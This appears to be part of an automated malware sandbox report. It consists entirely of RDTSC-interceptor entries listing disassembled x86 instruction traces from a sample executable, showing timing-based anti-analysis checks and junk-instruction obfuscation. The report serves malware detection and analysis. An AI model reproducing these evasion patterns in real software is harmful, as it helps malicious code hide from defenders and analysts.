      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289228 second address: 289237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289237 second address: 28923C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 28923C second address: 289242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289333 second address: 289338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289338 second address: 28937C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FA4591E8383h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007FA4591E8389h 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007FA4591E8376h 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 28937C second address: 289380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289380 second address: 2893AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jnl 00007FA4591E8376h 0x00000012 jmp 00007FA4591E8388h 0x00000017 popad 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2893AB second address: 2893B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2893B1 second address: 2893E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a pop eax 0x0000001b mov esi, dword ptr [ebp+122D2ADBh] 0x00000021 lea ebx, dword ptr [ebp+12453F8Ch] 0x00000027 mov dword ptr [ebp+122D1A00h], edi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 js 00007FA4591E837Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2893E9 second address: 2893ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289443 second address: 28944D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA4591E8376h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 28944D second address: 289471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add di, E900h 0x00000010 push 00000000h 0x00000012 jns 00007FA458C36919h 0x00000018 push 7C91D2A2h 0x0000001d pushad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289471 second address: 289487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA4591E837Fh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289487 second address: 28951F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7C91D222h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FA458C36918h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 call 00007FA458C36924h 0x0000002d mov dword ptr [ebp+122D1C38h], edi 0x00000033 pop ecx 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FA458C36918h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 mov edx, dword ptr [ebp+122D1BC3h] 0x00000056 jno 00007FA458C3691Ch 0x0000005c push 00000000h 0x0000005e mov dword ptr [ebp+122D1C58h], ecx 0x00000064 push 00000003h 0x00000066 mov dl, ah 0x00000068 push EBB0E3B0h 0x0000006d pushad 0x0000006e push edi 0x0000006f ja 00007FA458C36916h 0x00000075 pop edi 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 28951F second address: 289523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289523 second address: 289552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36920h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 2BB0E3B0h 0x00000011 mov dword ptr [ebp+1244E303h], edx 0x00000017 lea ebx, dword ptr [ebp+12453F97h] 0x0000001d mov esi, ebx 0x0000001f push eax 0x00000020 pushad 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 27126D second address: 27129C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 jbe 00007FA4591E8376h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 je 00007FA4591E8392h 0x00000017 jmp 00007FA4591E8386h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 27129C second address: 2712AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2712AC second address: 2712B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2A8B2E second address: 2A8B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA458C36916h 0x0000000a jmp 00007FA458C3691Bh 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2A8B44 second address: 2A8B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FA4591E8376h 0x00000009 jno 00007FA4591E8376h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2A8CD9 second address: 2A8CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2A8F9D second address: 2A8FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FA4591E8376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 29E692 second address: 29E696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2AA269 second address: 2AA26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2AA695 second address: 2AA699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2AA699 second address: 2AA6A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2AA6A1 second address: 2AA6A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2AA6A7 second address: 2AA6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 29E68A second address: 29E692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2AC72E second address: 2AC749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA4591E8376h 0x0000000a jmp 00007FA4591E8380h 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 27978E second address: 2797F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA458C36928h 0x00000011 popad 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FA458C36921h 0x0000001b jng 00007FA458C36916h 0x00000021 popad 0x00000022 pushad 0x00000023 push esi 0x00000024 pop esi 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FA458C3691Fh 0x0000002c popad 0x0000002d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2797F4 second address: 2797F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B061B second address: 2B061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B061F second address: 2B0625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B0625 second address: 2B062A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B0AA4 second address: 2B0AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B0AAB second address: 2B0AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B0C21 second address: 2B0C2B instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4591E837Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2AFBC1 second address: 2AFBC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B49E6 second address: 2B49F2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B49F2 second address: 2B49F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B49F8 second address: 2B4A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4591E8387h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B6F2D second address: 2B6F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4EE17F0Ah 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FA458C36918h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a call 00007FA458C36919h 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B6F7A second address: 2B6FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FA4591E8378h 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jnp 00007FA4591E8376h 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push edi 0x0000001f jbe 00007FA4591E837Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B6FA3 second address: 2B6FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FA458C36925h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B6FC8 second address: 2B6FE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4591E8380h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B70F4 second address: 2B710B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA458C36923h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B710B second address: 2B710F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7414 second address: 2B7426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jl 00007FA458C36920h 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B75A4 second address: 2B75B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7674 second address: 2B768B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C3691Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B768B second address: 2B7695 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA4591E8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7BED second address: 2B7BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7BF1 second address: 2B7C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA4591E837Eh 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7C09 second address: 2B7C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7DA8 second address: 2B7DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7DAC second address: 2B7DC1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA458C36916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FA458C36916h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7DC1 second address: 2B7DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7F72 second address: 2B7F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B7F76 second address: 2B7F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jl 00007FA4591E8388h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA4591E837Ah 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B8F86 second address: 2B8F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B8F90 second address: 2B8F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BAB53 second address: 2BAB59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BAB59 second address: 2BAB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BAB5D second address: 2BABCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FA458C36918h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jmp 00007FA458C36920h 0x0000002c push 00000000h 0x0000002e movzx edi, cx 0x00000031 xchg eax, ebx 0x00000032 jo 00007FA458C36924h 0x00000038 jmp 00007FA458C3691Eh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jmp 00007FA458C3691Bh 0x00000046 jng 00007FA458C36916h 0x0000004c popad 0x0000004d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BABCA second address: 2BABD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BB55D second address: 2BB5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA458C3691Ch 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FA458C3691Dh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FA458C36918h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d xor di, 00C3h 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 sub ebx, dword ptr [ebp+122D2A53h] 0x0000003b mov ecx, dword ptr [ebp+122D2DF6h] 0x00000041 popad 0x00000042 push 00000000h 0x00000044 mov edi, dword ptr [ebp+122D2D2Bh] 0x0000004a xchg eax, ebx 0x0000004b jbe 00007FA458C36935h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FA458C3691Eh 0x00000058 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BDB5E second address: 2BDB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BDB64 second address: 2BDB72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA458C36918h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BDB72 second address: 2BDB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BDB78 second address: 2BDB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BE242 second address: 2BE270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA4591E8383h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BE270 second address: 2BE2E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C3691Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FA458C36918h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FA458C36918h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov di, 30E6h 0x00000045 mov edi, dword ptr [ebp+122D1CD6h] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e and di, C826h 0x00000053 pop edi 0x00000054 push eax 0x00000055 je 00007FA458C36920h 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2BF583 second address: 2BF5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA4591E8376h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA4591E837Fh 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C3E4E second address: 2C3ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36927h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA458C36918h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 movzx ebx, si 0x0000002a mov dword ptr [ebp+122D1C40h], ecx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+1247C09Dh], edx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007FA458C36918h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 or ebx, 77A54DA2h 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
